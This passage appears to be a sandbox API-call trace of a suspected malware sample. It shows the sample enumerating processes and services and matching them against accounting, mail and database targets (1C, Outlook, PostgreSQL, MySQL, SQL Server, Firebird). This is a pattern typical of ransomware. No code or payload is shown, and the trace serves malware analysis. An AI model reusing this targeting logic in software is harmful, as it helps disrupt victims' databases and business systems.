lpString2="svchost.exe") returned -1 [0240.292] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.292] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.292] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.292] lstrlenW (lpString="audiodg.exe") returned 11 [0240.292] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0240.292] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0240.292] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0240.292] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0240.292] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0240.292] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0240.292] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0240.292] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.293] lstrlenW (lpString="svchost.exe") returned 11 [0240.293] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0240.293] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.293] lstrlenW (lpString="svchost.exe") returned 11 [0240.293] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0240.293] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0240.293] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0240.294] lstrlenW (lpString="userinit.exe") returned 12 [0240.294] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.294] lstrlenW (lpString="dwm.exe") returned 7 [0240.294] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.294] lstrlenW (lpString="explorer.exe") returned 12 [0240.294] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.295] lstrlenW (lpString="spoolsv.exe") returned 11 [0240.295] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.295] lstrlenW (lpString="taskhost.exe") returned 12 [0240.295] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.295] lstrlenW (lpString="svchost.exe") returned 11 [0240.295] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0240.296] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.296] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0240.296] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.296] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0240.296] lstrlenW (lpString="reader_sl.exe") returned 13 [0240.296] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="AdobeARM.exe")) returned 1 [0240.296] lstrlenW (lpString="AdobeARM.exe") returned 12 [0240.297] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0240.297] lstrlenW (lpString="cmd.exe") returned 7 [0240.297] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0240.297] lstrlenW (lpString="conhost.exe") returned 11 [0240.297] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0240.297] CloseHandle (hObject=0x120) returned 1 [0240.297] Sleep (dwMilliseconds=0x1f4) [0240.997] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb84560 [0241.050] EnumServicesStatusExW (in: hSCManager=0xb84560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0241.050] GetLastError () returned 0xea [0241.050] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa64) returned 0xba5c78 [0241.050] EnumServicesStatusExW (in: hSCManager=0xb84560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5c78, cbBufSize=0xa64, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5c78, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0241.050] CloseServiceHandle (hSCObject=0xb84560) returned 1 [0241.050] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0241.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0241.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0241.051] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0241.051] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0241.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0241.051] lstrlenW (lpString="AudioSrv") returned 8 [0241.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0241.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0241.051] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0241.051] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0241.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0241.051] lstrlenW (lpString="BFE") returned 3 [0241.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0241.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0241.051] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0241.051] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0241.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0241.051] lstrlenW (lpString="CscService") returned 10 [0241.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0241.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0241.051] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0241.051] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0241.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0241.051] lstrlenW (lpString="DcomLaunch") returned 10 [0241.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0241.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0241.051] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0241.051] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0241.051] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0241.051] lstrlenW (lpString="Dhcp") returned 4 [0241.051] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0241.051] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0241.051] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0241.051] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0241.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0241.052] lstrlenW (lpString="Dnscache") returned 8 [0241.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0241.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0241.052] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0241.052] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0241.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0241.052] lstrlenW (lpString="eventlog") returned 8 [0241.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0241.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0241.052] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0241.052] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0241.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0241.052] lstrlenW (lpString="EventSystem") returned 11 [0241.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0241.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0241.052] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0241.052] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0241.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0241.052] lstrlenW (lpString="gpsvc") returned 5 [0241.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0241.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0241.052] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0241.052] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0241.052] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0241.052] lstrlenW (lpString="lmhosts") returned 7 [0241.052] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0241.052] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0241.052] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0241.052] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0241.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0241.053] lstrlenW (lpString="MMCSS") returned 5 [0241.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0241.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0241.053] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0241.053] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0241.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0241.053] lstrlenW (lpString="MpsSvc") returned 6 [0241.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0241.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0241.053] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0241.053] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0241.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0241.053] lstrlenW (lpString="nsi") returned 3 [0241.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0241.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0241.053] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0241.053] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0241.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0241.053] lstrlenW (lpString="PlugPlay") returned 8 [0241.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0241.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0241.053] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0241.053] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0241.053] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0241.053] lstrlenW (lpString="Power") returned 5 [0241.053] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0241.053] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0241.053] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0241.053] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0241.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0241.054] lstrlenW (lpString="ProfSvc") returned 7 [0241.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0241.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0241.054] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0241.054] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0241.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0241.054] lstrlenW (lpString="RpcEptMapper") returned 12 [0241.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0241.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0241.054] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0241.054] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0241.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0241.054] lstrlenW (lpString="RpcSs") returned 5 [0241.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0241.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0241.054] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0241.054] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0241.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0241.054] lstrlenW (lpString="SamSs") returned 5 [0241.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0241.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0241.054] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0241.054] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0241.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0241.054] lstrlenW (lpString="Schedule") returned 8 [0241.054] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0241.054] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0241.054] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0241.054] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0241.054] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0241.055] lstrlenW (lpString="SENS") returned 4 [0241.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0241.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0241.055] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0241.055] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0241.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0241.055] lstrlenW (lpString="ShellHWDetection") returned 16 [0241.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0241.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0241.055] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0241.055] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0241.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0241.055] lstrlenW (lpString="Spooler") returned 7 [0241.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0241.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0241.055] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0241.055] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0241.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0241.055] lstrlenW (lpString="Themes") returned 6 [0241.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0241.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0241.055] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0241.055] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0241.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0241.055] lstrlenW (lpString="UxSms") returned 5 [0241.055] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0241.055] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0241.055] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0241.055] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0241.055] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0241.055] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba5c78 | out: hHeap=0xb00000) returned 1 [0241.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0241.056] Process32FirstW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.056] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.057] lstrlenW (lpString="System") returned 6 [0241.057] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0241.057] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0241.057] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0241.057] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0241.057] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0241.057] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0241.057] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0241.057] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.057] lstrlenW (lpString="smss.exe") returned 8 [0241.057] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0241.057] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0241.057] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0241.057] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0241.057] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0241.057] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0241.057] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0241.057] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.058] lstrlenW (lpString="csrss.exe") returned 9 [0241.058] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0241.058] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0241.058] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0241.058] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0241.058] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0241.058] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0241.058] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0241.058] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.058] lstrlenW (lpString="wininit.exe") returned 11 [0241.058] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0241.058] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0241.058] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0241.058] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0241.058] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0241.058] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0241.058] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0241.058] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.059] lstrlenW (lpString="csrss.exe") returned 9 [0241.059] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0241.059] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0241.059] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0241.059] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0241.059] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0241.059] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0241.059] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0241.059] Process32NextW (in: hSnapshot=0x120, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.059] lstrlenW (lpString="winlogon.exe") returned 12 [0241.059] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0241.059] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0241.059] 